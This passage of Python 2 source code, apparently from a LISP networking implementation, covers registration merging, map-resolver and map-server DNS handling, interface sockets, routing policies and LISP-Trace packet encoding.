self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
self.encrypt_json = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in self.individual_registrations.values():
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
#endif
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in self.individual_registrations.values():
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (new_rle.has_key(addr)): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (old_rle.keys() == new_rle.keys()): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
old_rle.keys(), new_rle.keys()))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special case details for
# longest match looks for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
self.encrypt_json = parent.encrypt_json
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr():
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_mr() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in lisp_map_resolvers_list.values():
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (lisp_map_resolvers_list.has_key(key) == False): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root():
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in self.referral_set.values():
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node():
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms():
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_ms() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in lisp_map_servers_list.values():
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (lisp_map_servers_list.has_key(key) == False): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface():
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
s = s.bind((device, 0))
self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime():
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
#
# Policy data structures.
#
class lisp_policy_match():
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#endclass
class lisp_policy():
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if lisp_geo_list.has_key(name) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if lisp_elp_list.has_key(name) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if lisp_rle_list.has_key(name) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if lisp_json_list.has_key(name) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
class lisp_pubsub():
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
#enddef
def add(self, eid_prefix):
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (lisp_pubsub_cache.has_key(eid) == False):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (pubsub.has_key(self.xtr_id)):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (lisp_pubsub_cache.has_key(eid)):
pubsub = lisp_pubsub_cache[eid]
if (pubsub.has_key(self.xtr_id)):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace():
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
#entry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in lisp_map_servers_list.values():
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in lisp_map_servers_list.values(): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in lisp_map_resolvers_list.values():
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in lisp_map_resolvers_list.values():
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
# Check IGMP packet first. And don't do IP checksum and don't test TTL.
#
if (ord(packet[9]) == 2): return([True, packet])
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return([False, None])
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return([False, None])
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return([False, None])
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return([False, packet])
#enddef
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
